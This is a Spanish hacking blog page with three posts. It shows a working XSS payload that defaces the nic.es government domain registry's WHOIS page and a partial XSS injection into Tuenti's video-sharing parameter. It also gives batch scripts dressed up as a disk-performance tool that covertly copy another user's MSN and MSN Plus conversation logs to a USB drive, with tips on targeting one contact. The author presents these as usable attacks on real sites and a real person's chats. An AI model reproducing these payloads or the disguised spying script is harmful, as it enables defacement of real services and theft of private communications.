May 05

XSS en “www.nic.es” (Web de dominios .es del gobierno)

Bug, Gobierno, Seguridad, Uncategorized, xss 4 Comments »

Bien, aquí les muestro un XSS en la web de NIC (Es la empresa oficial de dominios del gobierno de españa)

El XSS se encuentra en cuando se quiere hacer un WHOIS a un dominio

https://www.nic.es/esnic/esn/verValidacionWhoisAction?dominio=[XSS]

Por ejemplo:

https://www.nic.es/esnic/esn/verValidacionWhoisAction?dominio=”><br><img border=”0″ src=”http://i214.photobucket.com/albums/cc173/dimitrix-es/XSS and Others/DimitrixHack.png” width=”493″ height=”371″><big>PUTA LEY!

Diría que no es nada personal, pero quizás sea por la multa de medio millón de pesetas que me han puesto :P

Clickea en la imagen para hacerla en grande.

Tagged with:
May 02

Surfet: Programar para “Pillar” Conversaciones de Msn y Msn Plus

MSN, PLUS, Programa, Seguridad No Comments »

Me gustaría mostrar ya que está creado un programa en bat, que se trata de poner el pendrive, ejecutarlo y se copia las conversaciones de Msn y Msn plus al prendrive en modo oculto.

La aplicación está en MS-DOS (Bath…) y puse como que pareciera un programa para aumentar el rendimiento del PC, además al estar en Bath podeis modificarlo vosotros.

El problema mayor es que lo cree pensando en Msn, pero luego me di cuenta que el PC al que quería “pillar” las conversaciones tenía el Plus y se guardaba en otra carpeta de otra manera.

Además enseñaré un ejemplo de si quereis copiar automaticamente sólo un contacto en especial.

Para MSN:

@echo off
Color 30
echo.
echo                     ==================================
echo                     =        Surfet v.3.0.1          =
echo                     =        Analizador HDD          =
echo                     =             MoN                =
echo                     ==================================
echo.

set /p unidad= Nombre de unidad ejecucion:

echo.
echo Analizando HDD “%username%”
echo Puede tardar unos minutos, por favor espere, le indicaremos cuando haya finalizado.
echo.
xcopy “C:\Documents and Settings\%username%\Mis documentos\Mis archivos recibidos\*.*” “%unidad%:\FPs\” /S /C /Q

cls

echo.
echo                     ==================================
echo                     =        Surfet v.3.0.1          =
echo                     =        Analizador HDD          =
echo                     =             MoN                =
echo                     ==================================
echo.
echo.
echo Surfet termino de analizar y reparar el disco duro
echo Rendimiento conseguido:                        34%
echo.
pause

Para MSN-PLUS:

@echo off
Color 30
echo.
echo                     ==================================
echo                     =        Surfet v.3.0.1          =
echo                     =        Analizador HDD          =
echo                     =             MoN                =
echo                     ==================================
echo.

set /p unidad= Nombre de unidad ejecucion:

echo.
echo Analizando HDD “%username%”
echo Puede tardar unos minutos, por favor espere, le indicaremos cuando haya finalizado.
echo.
xcopy “C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*.*” “%unidad%:\FPs\” /S /C /Q
cls

echo.
echo                     ==================================
echo                     =        Surfet v.3.0.1          =
echo                     =        Analizador HDD          =
echo                     =             MoN                =
echo                     ==================================
echo.
echo.
echo Surfet termino de analizar y reparar el disco duro
echo Rendimiento conseguido:                        34%
echo.
pause

Bien, el caso, para que todo parezca más real, la única variable que no he programa en automática es la de la únidad del pendrive donde se ejecuta.

Entonces, una vez ejecutamos la aplicación, pondremos en que unidad está y presionamos ENTER, entonces se copiarán todos los datos a la carpeta “FPs” del pen-drive (recomiendo crearla antes para que no aparezca “por arte de magia”)

También, si queremos cambiar que sólo copie las conversaciones de un contacto, por ejemplo de “peibol@hotmail.com”, modificaremos por ejemplo en el de MSN-PLUS la parte

xcopy “C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*.*” “%unidad%:\FPs\” /S /C /Q

por el siguiente:

xcopy “C:\Documents and Settings\%username%\Mis documentos\Mis historiales de conversaci¢n\*peibol@hotmail.com.html” “%unidad%:\FPs\” /S /C /Q

Descargar (los dos archivos ya creados): http://www.megaupload.com/?d=293D1ZKC

Creador: Dimitrix

Tagged with:
May 01

XSS en Tuenti parcial

Bug, Seguridad, Tuenti, xss 3 Comments »

Bueno, algo que vi hace tiempo es esta especie de XSS parcial, digo parcial por que no filtra etiquetas HTML, pero tienes muchos problemas para ejecutar código, sobretodo con el símbolo “=”

El XSS se encuentrae en la variable “id” que carga videos de youtube

http://www.tuenti.com/#m=sharevideo&id=GvEh40Sd24

http://www.tuenti.com/#m=sharevideo&id=[XSS]

No obstante, primero tendremos que bloquear el script del video, para así poner nuestro nuevo códigos con menos problemas, yo hice esto

http://www.tuenti.com/#m=sharevideo&id=GvEh40Sd24“></script>

Algo muy importante es que tienes que poner el ID de un video que funcione primero y después el código, el código que muestro en el video (que se puede ver como se desplaza la frase es el siguiente):

http://www.tuenti.com/#m=sharevideo&id=GvEh40Sd24″></script><hr><h1><big><marquee><center>SALUDO A TODOS DESDE TUENTI!, DIMITRIX!</center></h1><hr>

Seguramente, después de este post, pondré uno sobre seguridad, como saltarse algunas restricciones y otras cosas “Muy divertidas”

Tagged with:
preload preload preload